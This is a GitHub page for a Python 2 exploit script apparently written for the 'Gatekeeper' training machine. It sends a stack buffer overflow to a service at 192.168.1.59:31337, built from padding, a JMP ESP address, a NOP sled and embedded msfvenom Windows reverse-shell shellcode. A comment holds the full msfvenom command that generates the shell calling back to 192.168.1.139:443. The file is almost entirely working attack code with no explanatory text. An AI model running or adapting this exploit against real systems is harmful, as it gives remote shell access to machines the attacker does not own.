-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathgatekeeper_revshell.py
More file actions
60 lines (56 loc) · 2.68 KB
/
gatekeeper_revshell.py
File metadata and controls
60 lines (56 loc) · 2.68 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/python
import socket,sys
from time import sleep
ip="192.168.1.59"
port=31337
esp ="\xC3\x14\x04\x08" #JMP ESP adress in littleendian format
nops = "\x90"*16
#badchar_test = "" #start with empty string
#badchars = [0x00, 0x0A] #every time bad...
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.139 LPORT=443 EXITFUNC=thread -b '\x00\x0A' -f python --var-name shellcode EXITFUNC=thread
shellcode = b""
shellcode += b"\xd9\xc6\xbe\x9f\x8f\x39\xeb\xd9\x74\x24\xf4"
shellcode += b"\x5f\x31\xc9\xb1\x52\x83\xef\xfc\x31\x77\x13"
shellcode += b"\x03\xe8\x9c\xdb\x1e\xea\x4b\x99\xe1\x12\x8c"
shellcode += b"\xfe\x68\xf7\xbd\x3e\x0e\x7c\xed\x8e\x44\xd0"
shellcode += b"\x02\x64\x08\xc0\x91\x08\x85\xe7\x12\xa6\xf3"
shellcode += b"\xc6\xa3\x9b\xc0\x49\x20\xe6\x14\xa9\x19\x29"
shellcode += b"\x69\xa8\x5e\x54\x80\xf8\x37\x12\x37\xec\x3c"
shellcode += b"\x6e\x84\x87\x0f\x7e\x8c\x74\xc7\x81\xbd\x2b"
shellcode += b"\x53\xd8\x1d\xca\xb0\x50\x14\xd4\xd5\x5d\xee"
shellcode += b"\x6f\x2d\x29\xf1\xb9\x7f\xd2\x5e\x84\x4f\x21"
shellcode += b"\x9e\xc1\x68\xda\xd5\x3b\x8b\x67\xee\xf8\xf1"
shellcode += b"\xb3\x7b\x1a\x51\x37\xdb\xc6\x63\x94\xba\x8d"
shellcode += b"\x68\x51\xc8\xc9\x6c\x64\x1d\x62\x88\xed\xa0"
shellcode += b"\xa4\x18\xb5\x86\x60\x40\x6d\xa6\x31\x2c\xc0"
shellcode += b"\xd7\x21\x8f\xbd\x7d\x2a\x22\xa9\x0f\x71\x2b"
shellcode += b"\x1e\x22\x89\xab\x08\x35\xfa\x99\x97\xed\x94"
shellcode += b"\x91\x50\x28\x63\xd5\x4a\x8c\xfb\x28\x75\xed"
shellcode += b"\xd2\xee\x21\xbd\x4c\xc6\x49\x56\x8c\xe7\x9f"
shellcode += b"\xf9\xdc\x47\x70\xba\x8c\x27\x20\x52\xc6\xa7"
shellcode += b"\x1f\x42\xe9\x6d\x08\xe9\x10\xe6\xf7\x46\x1b"
shellcode += b"\x7d\x9f\x94\x1b\x80\xdb\x10\xfd\xe8\x0b\x75"
shellcode += b"\x56\x85\xb2\xdc\x2c\x34\x3a\xcb\x49\x76\xb0"
shellcode += b"\xf8\xae\x39\x31\x74\xbc\xae\xb1\xc3\x9e\x79"
shellcode += b"\xcd\xf9\xb6\xe6\x5c\x66\x46\x60\x7d\x31\x11"
shellcode += b"\x25\xb3\x48\xf7\xdb\xea\xe2\xe5\x21\x6a\xcc"
shellcode += b"\xad\xfd\x4f\xd3\x2c\x73\xeb\xf7\x3e\x4d\xf4"
shellcode += b"\xb3\x6a\x01\xa3\x6d\xc4\xe7\x1d\xdc\xbe\xb1"
shellcode += b"\xf2\xb6\x56\x47\x39\x09\x20\x48\x14\xff\xcc"
shellcode += b"\xf9\xc1\x46\xf3\x36\x86\x4e\x8c\x2a\x36\xb0"
shellcode += b"\x47\xef\x56\x53\x4d\x1a\xff\xca\x04\xa7\x62"
shellcode += b"\xed\xf3\xe4\x9a\x6e\xf1\x94\x58\x6e\x70\x90"
shellcode += b"\x25\x28\x69\xe8\x36\xdd\x8d\x5f\x36\xf4"
bof = "A"*146 + esp + nops + shellcode
#shellcode length can be 844
#badchar = x00x0a
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
print "Fuzzing with "+str(len(bof))+" Characters"
s.send(bof + '\r\n')
s.recv(1024)
s.close()
except:
print "Some Error Occured"
sys.exit(0)